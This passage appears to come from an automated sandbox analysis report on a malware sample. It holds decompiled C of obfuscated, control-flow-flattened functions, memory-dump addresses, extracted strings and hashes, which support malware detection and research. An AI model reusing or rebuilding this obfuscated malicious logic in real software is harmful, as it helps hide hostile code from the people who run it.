							_t785 = E00211BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
							_t706 = _v252;
							E00222025(_t706, _t787, _v84, _v184);
							_t795 = _t795 + 0x40;
							__eflags = _t785;
							if(_t785 == 0) {
								_t786 = 0x2cd2473d;
								L44:
								_t707 = _v320;
								_t758 = 0x1fbed331;
								goto L45;
							}
							_push(_t706);
							_v28 = 1;
							_t693 = E00226AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
							_t795 = _t795 + 0x18;
							_v28 = _t693;
							_t786 = 0xa0d70be;
							goto L13;
						}
						__eflags = _t786 - 0x25fbc0d1;
						if(_t786 == 0x25fbc0d1) {
							_push(0x200);
							_v24 = 0x200;
							_t788 = E00218736(0x200);
							_t712 = 0x200;
							__eflags = _t788;
							if(_t788 != 0) {
								_t687 = E0021F74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
								_t795 = _t795 + 0x10;
								__eflags = _t687;
								if(_t687 == 0) {
									_t689 = E00220F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
									_t795 = _t795 + 0x14;
									_v320 = _t689;
								}
								E0021F536(_v224, _v48, _v312, _t788);
							}
							_t786 = 0x276816a4;
							goto L13;
						}
						__eflags = _t786 - 0x276816a4;
						if(_t786 == 0x276816a4) {
							_push(_t707);
							_t672 = E00215A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
							__eflags = _t672;
							_v32 = _t672;
							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
							E0021F536(_v276, _v44, _v112, _v320);
							_t795 = _t795 + 0x24;
							goto L44;
						}
						__eflags = _t786 - 0x2cd2473d;
						if(_t786 == 0x2cd2473d) {
							E00217925(_v172, _t666, _v212, _v188);
							_t786 = 0x1e7ff602;
							goto L12;
						}
						__eflags = _t786 - 0x33e5fd12;
						if(__eflags != 0) {
							goto L45;
						}
						__eflags = E0022687F(_t785, _v156, __eflags) - _v52;
						_t758 = 0x1fbed331;
						_t666 = _v316;
						_t707 = _v320;
						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
					}
				}
			}

0x0021c777
0x0021c77c
0x0021c786
0x0021c78d
0x0021c794
0x0021c79b
0x0021c7a2
0x0021c7a9
0x0021c7aa
0x0021c7b1
0x0021c7b8
0x0021c7bf
0x0021c7c6
0x0021c7c7
0x0021c7c8
0x0021c7cd
0x0021c7da
0x0021c7e3
0x0021c7ea
0x0021c7ec
0x0021c7f3
0x0021c7f6
0x0021c7fe
0x0021c803
0x0021c808
0x0021c80d
0x0021c815
0x0021c820
0x0021c828
0x0021c830
0x0021c83b
0x0021c846
0x0021c851
0x0021c85c
0x0021c867
0x0021c872
0x0021c87d
0x0021c888
0x0021c893
0x0021c89e
0x0021c8a9
0x0021c8b4
0x0021c8bf
0x0021c8ca
0x0021c8d2
0x0021c8dd
0x0021c8e8
0x0021c8f0
0x0021c8fb
0x0021c906
0x0021c90e
0x0021c919
0x0021c921
0x0021c929
0x0021c92e
0x0021c936
0x0021c93e
0x0021c943
0x0021c94b
0x0021c950
0x0021c958
0x0021c963
0x0021c972
0x0021c976
0x0021c97d
0x0021c988
0x0021c993
0x0021c99b
0x0021c9a3
0x0021c9ae
0x0021c9b9
0x0021c9c4
0x0021c9da
0x0021c9df
0x0021c9e8
0x0021c9f3
0x0021ca05
0x0021ca0a
0x0021ca13
0x0021ca1e
0x0021ca26
0x0021ca33
0x0021ca36
0x0021ca3a
0x0021ca3f
0x0021ca47
0x0021ca5d
0x0021ca64
0x0021ca6f
0x0021ca77
0x0021ca7f
0x0021ca84
0x0021ca8c
0x0021ca98
0x0021ca9d
0x0021caa3
0x0021caab
0x0021cab3
0x0021cac6
0x0021cac9
0x0021cad0
0x0021cadb
0x0021caf1
0x0021caf8
0x0021cb03
0x0021cb0b
0x0021cb10
0x0021cb15
0x0021cb1a
0x0021cb22
0x0021cb2a
0x0021cb37
0x0021cb38
0x0021cb3c
0x0021cb44
0x0021cb4f
0x0021cb5a
0x0021cb65
0x0021cb6d
0x0021cb75
0x0021cb80
0x0021cb84
0x0021cb8c
0x0021cb94
0x0021cb99
0x0021cb9e
0x0021cba2
0x0021cbac
0x0021cbba
0x0021cbbd
0x0021cbc1
0x0021cbc9
0x0021cbce
0x0021cbd6
0x0021cbe1
0x0021cbec
0x0021cbf4
0x0021cbff
0x0021cc0a
0x0021cc15
0x0021cc20
0x0021cc2d
0x0021cc31
0x0021cc39
0x0021cc3e
0x0021cc46
0x0021cc51
0x0021cc5c
0x0021cc67
0x0021cc72
0x0021cc7d
0x0021cc88
0x0021cc90
0x0021cc98
0x0021cca0
0x0021cca8
0x0021ccb3
0x0021ccba
0x0021ccc5
0x0021ccd0
0x0021ccd8
0x0021ccdd
0x0021cce2
0x0021ccea
0x0021ccf5
0x0021cd00
0x0021cd0b
0x0021cd16
0x0021cd1e
0x0021cd23
0x0021cd2b
0x0021cd33
0x0021cd3e
0x0021cd49
0x0021cd54
0x0021cd5f
0x0021cd6a
0x0021cd72
0x0021cd7d
0x0021cd85
0x0021cd8d
0x0021cd95
0x0021cd9d
0x0021cda5
0x0021cdad
0x0021cdba
0x0021cdbe
0x0021cdc3
0x0021cdcb
0x0021cdd6
0x0021cde1
0x0021cdec
0x0021cdf7
0x0021ce02
0x0021ce0d
0x0021ce18
0x0021ce20
0x0021ce28
0x0021ce35
0x0021ce49
0x0021ce4e
0x0021ce57
0x0021ce5f
0x0021ce6a
0x0021ce72
0x0021ce77
0x0021ce7f
0x0021ce84
0x0021ce8c
0x0021ce97
0x0021cea2
0x0021cead
0x0021ceb5
0x0021cebd
0x0021cec5
0x0021cecd
0x0021ced5
0x0021cedd
0x0021cee5
0x0021ceea
0x0021ceef
0x0021cef7
0x0021ceff
0x0021cf0c
0x0021cf0d
0x0021cf11
0x0021cf19
0x0021cf24
0x0021cf2c
0x0021cf37
0x0021cf4a
0x0021cf51
0x0021cf5c
0x0021cf67
0x0021cf72
0x0021cf7a
0x0021cf85
0x0021cf98
0x0021cf9f
0x0021cfaa
0x0021cfb7
0x0021cfbb
0x0021cfc3
0x0021cfcb
0x0021cfd3
0x0021cfde
0x0021cfe9
0x0021cff4
0x0021cfff
0x0021d00a
0x0021d015
0x0021d020
0x0021d02b
0x0021d036
0x0021d041
0x0021d049
0x0021d04e
0x0021d056
0x0021d05e
0x0021d069
0x0021d074
0x0021d07c
0x0021d087
0x0021d095
0x0021d099
0x0021d0a1
0x0021d0a9
0x0021d0b1
0x0021d0bc
0x0021d0c7
0x0021d0d2
0x0021d0df
0x0021d0ea
0x0021d0f5
0x0021d100
0x0021d108
0x0021d113
0x0021d11e
0x0021d126
0x0021d132
0x0021d135
0x0021d13c
0x0021d147
0x0021d152
0x0021d15d
0x0021d165
0x0021d170
0x0021d186
0x0021d18d
0x0021d198
0x0021d1a0
0x0021d1a8
0x0021d1b5
0x0021d1b8
0x0021d1bc
0x0021d1c4
0x0021d1da
0x0021d1e8
0x0021d1eb
0x0021d1f2
0x0021d1f9
0x0021d208
0x0021d208
0x0021d208
0x0021d20d
0x0021d20d
0x0021d20f
0x0021d20f
0x0021d215
0x0021d215
0x0021d386
0x0021d388
0x0021d38f
0x0021d390
0x0021d29d
0x0021d29d
0x0021d2a1
0x0021d2a1
0x00000000
0x0021d2a1
0x0021d221
0x0021d31f
0x0021d321
0x0021d327
0x0021d327
0x0021d323
0x0021d323
0x0021d323
0x0021d329
0x0021d32b
0x0021d332
0x0021d332
0x0021d32d
0x0021d32d
0x0021d32d
0x0021d35b
0x0021d360
0x0021d365
0x0021d36d
0x00000000
0x0021d36d
0x0021d22d
0x0021d315
0x0021d20d
0x0021d20d
0x0021d20f
0x0021d20f
0x00000000
0x0021d20f
0x00000000
0x0021d20d
0x0021d23a
0x0021d2f8
0x0021d2fd
0x0021d300
0x0021d304
0x0021d310
0x00000000
0x0021d310
0x0021d242
0x0021d291
0x0021d296
0x0021d29b
0x00000000
0x0021d29c
0x0021d24a
0x0021d639
0x0021d639
0x0021d63f
0x0021d272
0x0021d27c
0x0021d27c
0x0021d645
0x00000000
0x0021d645
0x0021d269
0x00000000
0x0021d398
0x0021d398
0x0021d39e
0x0021d51a
0x0021d51c
0x0021d53c
0x0021d51e
0x0021d51e
0x0021d52b
0x0021d530
0x0021d533
0x0021d533
0x0021d5c9
0x0021d5d2
0x0021d5d9
0x0021d5de
0x0021d5e1
0x0021d5e3
0x0021d62b
0x0021d630
0x0021d630
0x0021d634
0x00000000
0x0021d634
0x0021d5e5
0x0021d5f1
0x0021d612
0x0021d617
0x0021d61a
0x0021d621
0x00000000
0x0021d621
0x0021d3a4
0x0021d3aa
0x0021d498
0x0021d49a
0x0021d4a6
0x0021d4a9
0x0021d4aa
0x0021d4ac
0x0021d4c7
0x0021d4cc
0x0021d4cf
0x0021d4d1
0x0021d4ed
0x0021d4f2
0x0021d4f5
0x0021d4f5
0x0021d509
0x0021d50f
0x0021d510
0x00000000
0x0021d510
0x0021d3b0
0x0021d3b6
0x0021d423
0x0021d442
0x0021d447
0x0021d449
0x0021d45a
0x0021d474
0x0021d479
0x00000000
0x0021d479
0x0021d3b8
0x0021d3be
0x0021d414
0x0021d419
0x00000000
0x0021d419
0x0021d3c0
0x0021d3c6
0x00000000
0x00000000
0x0021d3e6
0x0021d3e8
0x0021d3ed
0x0021d3f1
0x0021d3f5
0x0021d3f5
0x0021d20d

Strings

r, xrefs: 0021CC20
,, xrefs: 0021C830
?o, xrefs: 0021D1C4
XD, xrefs: 0021D0B1
m^, xrefs: 0021CAA3
3, xrefs: 0021CA13
Ta$ , xrefs: 0021D398
Qjcc, xrefs: 0021D13C
., xrefs: 0021D0DF
@l, xrefs: 0021CEA2
Ta$ , xrefs: 0021D30B
q, xrefs: 0021CEEF
", xrefs: 0021CFC3
@|, xrefs: 0021CE35
^, xrefs: 0021C936
~, xrefs: 0021D041
T, xrefs: 0021C99B
rW, xrefs: 0021CAF8
.ll:, xrefs: 0021D1BC

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "$.ll:$.$?o$@l$@|$Qjcc$T$Ta$ $Ta$ $XD$^$m^$r$rW$,$3$q$~
API String ID: 0-3595463394
Opcode ID: 3a31ab64e9517a36bfc738e83faac66436d3b1233f2d3713ca1ed052a004d1c1
Instruction ID: b6c6ad61d7f772e5f4c10b8cd484c4eb76436fab7c787ff14d18256ab3879344
Opcode Fuzzy Hash: 3a31ab64e9517a36bfc738e83faac66436d3b1233f2d3713ca1ed052a004d1c1
Instruction Fuzzy Hash: BE721F71508381DBE3B8CF25C58AB9BBBE1BBD4304F10891DE5D9862A0DBB58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021D7EB, Relevance: 21.6, Strings: 17, Instructions: 347
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0021D7EB() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				void* _t365;
				intOrPtr _t367;
				signed int _t379;
				void* _t380;
				void* _t399;
				intOrPtr _t402;
				signed int _t408;
				intOrPtr _t409;
				intOrPtr* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t416;
				signed int* _t417;
				void* _t419;

				_t417 =  &_v1212;
				_v1164 = 0xe848;
				_v1164 = _v1164 << 0xc;
				_t380 = 0xeb1d0fe;
				_v1164 = _v1164 << 2;
				_v1164 = _v1164 ^ 0x3a120029;
				_v1196 = 0xb50a;
				_v1196 = _v1196 * 0x54;
				_v1196 = _v1196 << 1;
				_v1196 = _v1196 << 0xc;
				_v1196 = _v1196 ^ 0x6ce97179;
				_v1072 = 0xa1a9;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 ^ 0x00006740;
				_v1112 = 0x5ab8;
				_v1112 = _v1112 | 0xd40f1486;
				_v1112 = _v1112 ^ 0xd40f3c8d;
				_v1168 = 0x99b2;
				_v1168 = _v1168 ^ 0x8e209920;
				_v1168 = _v1168 + 0x17b0;
				_v1168 = _v1168 + 0xffff252c;
				_v1168 = _v1168 ^ 0x8e1f3ab7;
				_v1108 = 0x6700;
				_v1108 = _v1108 ^ 0xd74b138d;
				_v1108 = _v1108 ^ 0xd74b4d2a;
				_v1116 = 0xa6d3;
				_v1116 = _v1116 << 0xc;
				_v1116 = _v1116 ^ 0x0a6d47ef;
				_v1144 = 0x46d4;
				_v1144 = _v1144 | 0x60392883;
				_t411 = 0x3e;
				_v1052 = _v1052 & 0x00000000;
				_v1144 = _v1144 / _t411;
				_v1144 = _v1144 ^ 0x018d3ef5;
				_v1212 = 0x195d;
				_v1212 = _v1212 + 0x9a8f;
				_v1212 = _v1212 >> 2;
				_v1212 = _v1212 >> 0xf;
				_v1212 = _v1212 ^ 0x00005610;
				_v1092 = 0x8c48;
				_v1092 = _v1092 | 0x14bcb660;
				_v1092 = _v1092 ^ 0x14bcd719;
				_v1184 = 0xdf30;
				_v1184 = _v1184 | 0x71150163;
				_v1184 = _v1184 + 0xffff3ca6;
				_v1184 = _v1184 >> 5;
				_v1184 = _v1184 ^ 0x03888299;
				_v1100 = 0xf0a2;
				_v1100 = _v1100 >> 2;
				_v1100 = _v1100 ^ 0x00007018;
				_v1076 = 0xde4e;
				_v1076 = _v1076 * 0x25;
				_v1076 = _v1076 ^ 0x0020254d;
				_v1084 = 0x8f7c;
				_v1084 = _v1084 + 0x3023;
				_v1084 = _v1084 ^ 0x00008967;
				_v1136 = 0x4c3;
				_v1136 = _v1136 + 0xbbe6;
				_v1136 = _v1136 | 0x03b94668;
				_v1136 = _v1136 ^ 0x03b9f10c;
				_v1120 = 0xdab0;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0x0003158f;
				_v1080 = 0xb6c1;
				_v1080 = _v1080 ^ 0x2339c7b2;
				_v1080 = _v1080 ^ 0x2339156d;
				_v1152 = 0xaa63;
				_v1152 = _v1152 | 0x7d17af71;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x7af75802;
				_v1088 = 0x49a;
				_v1088 = _v1088 >> 9;
				_v1088 = _v1088 ^ 0x00004f36;
				_v1192 = 0x2678;
				_v1192 = _v1192 + 0xb679;
				_v1192 = _v1192 << 0x10;
				_v1192 = _v1192 + 0xffff3370;
				_v1192 = _v1192 ^ 0xdcf068a3;
				_v1064 = 0xeafb;
				_v1064 = _v1064 << 1;
				_v1064 = _v1064 ^ 0x00019538;
				_v1096 = 0x88f8;
				_t412 = 0x34;
				_v1096 = _v1096 * 0x4f;
				_v1096 = _v1096 ^ 0x002a1ade;
				_v1132 = 0xf8dd;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 * 6;
				_v1132 = _v1132 ^ 0x2ea92e25;
				_v1148 = 0xb66c;
				_v1148 = _v1148 * 0x79;
				_v1148 = _v1148 * 0x37;
				_v1148 = _v1148 ^ 0x12863225;
				_v1044 = 0x2ced;
				_v1044 = _v1044 | 0x6c1d274b;
				_v1044 = _v1044 ^ 0x6c1d554c;
				_v1104 = 0xd4fb;
				_v1104 = _v1104 + 0xc222;
				_v1104 = _v1104 ^ 0x0001c0a4;
				_v1140 = 0xeff1;
				_v1140 = _v1140 | 0x2c578e17;
				_v1140 = _v1140 ^ 0x1f5808a8;
				_v1140 = _v1140 ^ 0x330f90e2;
				_v1156 = 0x54a4;
				_v1156 = _v1156 ^ 0xe69aec3e;
				_v1156 = _v1156 ^ 0x7a062859;
				_v1156 = _v1156 ^ 0x9c9c8f10;
				_v1180 = 0xa2be;
				_v1180 = _v1180 / _t412;
				_v1180 = _v1180 << 0xb;
				_v1180 = _v1180 << 6;
				_v1180 = _v1180 ^ 0x0642737d;
				_v1204 = 0x65ae;
				_v1204 = _v1204 + 0xb2b7;
				_v1204 = _v1204 + 0xbb73;
				_v1204 = _v1204 << 6;
				_v1204 = _v1204 ^ 0x0074b164;
				_v1176 = 0x3ecd;
				_v1176 = _v1176 | 0x1d534930;
				_v1176 = _v1176 << 0xa;
				_v1176 = _v1176 ^ 0x842f9ee3;
				_v1176 = _v1176 ^ 0xc9d04901;
				_v1056 = 0xf360;
				_v1056 = _v1056 | 0x93122b66;
				_v1056 = _v1056 ^ 0x9312fd26;
				_v1124 = 0x4a26;
				_v1124 = _v1124 | 0x286a3d77;
				_v1124 = _v1124 ^ 0x286a2522;
				_v1060 = 0x57ed;
				_v1060 = _v1060 + 0x784b;
				_v1060 = _v1060 ^ 0x0000c3a5;
				_v1068 = 0x69c7;
				_v1068 = _v1068 << 5;
				_v1068 = _v1068 ^ 0x000d6de9;
				_v1208 = 0xffbd;
				_v1208 = _v1208 * 0x3d;
				_v1208 = _v1208 << 5;
				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x22ca2c; // 0x558300
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00215FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E002154FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E0021C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E002242DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00215FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E0022889D(0x22c930, _v1108, __eflags);
							_t367 =  *0x22ca2c; // 0x558300
							_t402 =  *0x22ca2c; // 0x558300
							E002129E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00222025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00212959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}

0x0021d7eb
0x0021d7f1
0x0021d7fb
0x0021d800
0x0021d805
0x0021d80a
0x0021d812
0x0021d823
0x0021d827
0x0021d82b
0x0021d830
0x0021d838
0x0021d843
0x0021d84b
0x0021d856
0x0021d85e
0x0021d866
0x0021d86e
0x0021d876
0x0021d87e
0x0021d886
0x0021d88e
0x0021d896
0x0021d89e
0x0021d8a6
0x0021d8ae
0x0021d8b6
0x0021d8bb
0x0021d8c3
0x0021d8cb
0x0021d8d9
0x0021d8dc
0x0021d8e4
0x0021d8e8
0x0021d8f0
0x0021d8f8
0x0021d900
0x0021d905
0x0021d90a
0x0021d912
0x0021d91d
0x0021d928
0x0021d933
0x0021d93b
0x0021d943
0x0021d94b
0x0021d950
0x0021d958
0x0021d963
0x0021d96b
0x0021d976
0x0021d989
0x0021d990
0x0021d99b
0x0021d9a6
0x0021d9b1
0x0021d9bc
0x0021d9c4
0x0021d9cc
0x0021d9d4
0x0021d9dc
0x0021d9e4
0x0021d9e9
0x0021d9f1
0x0021d9fc
0x0021da07
0x0021da12
0x0021da1a
0x0021da22
0x0021da27
0x0021da2f
0x0021da3a
0x0021da42
0x0021da4f
0x0021da57
0x0021da5f
0x0021da64
0x0021da6c
0x0021da74
0x0021da7f
0x0021da86
0x0021da91
0x0021daa6
0x0021daa7
0x0021daae
0x0021dab9
0x0021dac1
0x0021dacb
0x0021dacf
0x0021dad7
0x0021dae4
0x0021daed
0x0021daf1
0x0021daf9
0x0021db04
0x0021db0f
0x0021db1a
0x0021db22
0x0021db2a
0x0021db32
0x0021db3a
0x0021db42
0x0021db4a
0x0021db52
0x0021db5a
0x0021db62
0x0021db6a
0x0021db72
0x0021db80
0x0021db84
0x0021db89
0x0021db8e
0x0021db96
0x0021db9e
0x0021dba6
0x0021dbae
0x0021dbb3
0x0021dbbb
0x0021dbc3
0x0021dbcb
0x0021dbd0
0x0021dbd8
0x0021dbe0
0x0021dbeb
0x0021dbf6
0x0021dc01
0x0021dc09
0x0021dc11
0x0021dc19
0x0021dc24
0x0021dc2f
0x0021dc3a
0x0021dc45
0x0021dc4d
0x0021dc58
0x0021dc65
0x0021dc69
0x0021dc6e
0x0021dc76
0x0021dc7e
0x0021dc86
0x0021dc8b
0x0021dc93
0x0021dc9b
0x0021dcb2
0x0021dcb5
0x0021dcbc
0x0021dcc3
0x0021dcce
0x0021dcde
0x0021dce5
0x0021dce9
0x0021dcf1
0x0021dcf9
0x0021dd01
0x0021dd0d
0x0021dd10
0x0021dd17
0x0021dd1b
0x0021dd20
0x0021dd28
0x0021dd30
0x0021dd38
0x0021dd40
0x0021dd45
0x0021dd4d
0x0021dd55
0x0021dd5d
0x0021dd65
0x0021dd6d
0x0021dd75
0x0021dd75
0x0021dd77
0x0021dd78
0x0021dd78
0x0021dd78
0x0021dd78
0x0021dd7e
0x00000000
0x00000000
0x0021dd84
0x0021de9f
0x0021dea5
0x0021deb0
0x0021deb0
0x0021deb3
0x00000000
0x00000000
0x0021dead
0x0021dead
0x0021dead
0x0021deb5
0x0021deb8
0x00000000
0x0021deb8
0x0021dd90
0x0021dfca
0x0021dfd0
0x0021dfe1
0x0021dfe1
0x0021dd9c
0x0021de77
0x0021de79
0x0021de7c
0x0021de7e
0x0021de95
0x0021de80
0x0021de80
0x0021de85
0x0021de85
0x0021dd75
0x0021dd75
0x0021dd77
0x00000000
0x0021dd77
0x0021dd75
0x0021dda4
0x0021ddd7
0x0021ddd8
0x0021ddfc
0x0021de01
0x0021de04
0x0021dd75
0x0021dd75
0x0021dd77
0x00000000
0x0021dd77
0x0021dd75
0x0021ddac
0x00000000
0x00000000
0x0021ddc8
0x0021ddcd
0x0021ddd0
0x0021dd75
0x0021dd75
0x0021dd77
0x00000000
0x0021dd77
0x0021dd75
0x0021dec2
0x0021dec8
0x0021dfa5
0x0021dfad
0x0021dfb2
0x00000000
0x0021dfb2
0x0021dece
0x0021ded4
0x0021df14
0x0021df21
0x0021df42
0x0021df5c
0x0021df68
0x0021df84
0x0021df89
0x0021df8c
0x0021dd75
0x0021dd75
0x0021dd77
0x00000000
0x0021dd77
0x0021dd75
0x0021ded6
0x0021dedc
0x00000000
0x00000000
0x0021defd
0x0021deff
0x0021df02
0x0021df04
0x00000000
0x00000000
0x0021df0a
0x00000000
0x0021dfb3
0x0021dfb3
0x0021dfb3
0x00000000
0x0021dfbf

Strings

e/!, xrefs: 0021DDA6
6O, xrefs: 0021DA42
m, xrefs: 0021DC4D
Kx, xrefs: 0021DC24
yql, xrefs: 0021D830
e/!, xrefs: 0021DE80
,, xrefs: 0021DAF9
M% , xrefs: 0021D990
x&, xrefs: 0021DA4F
'], xrefs: 0021DC7E
Gm, xrefs: 0021D8BB
rj4, xrefs: 0021DCF1
), xrefs: 0021D80A
#0, xrefs: 0021D9A6
"%j(, xrefs: 0021DC11
H, xrefs: 0021D7F1
@g, xrefs: 0021D84B

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
API String ID: 0-131801274
Opcode ID: b764fb07d9427a01c88a557c9ce3297dc7afd100add9e1788c1e02dae0a47609
Instruction ID: e8dd7c4b765697e503c5530a10e73be865742c05ae3aae41bbb001702008c765
Opcode Fuzzy Hash: b764fb07d9427a01c88a557c9ce3297dc7afd100add9e1788c1e02dae0a47609
Instruction Fuzzy Hash: EE021371118380DFE369CF61C94AA9BBBE1FBD5708F10891DE1DA862A0C7B58959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0021F98C, Relevance: 20.4, Strings: 16, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0021F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0021602B(_t344);
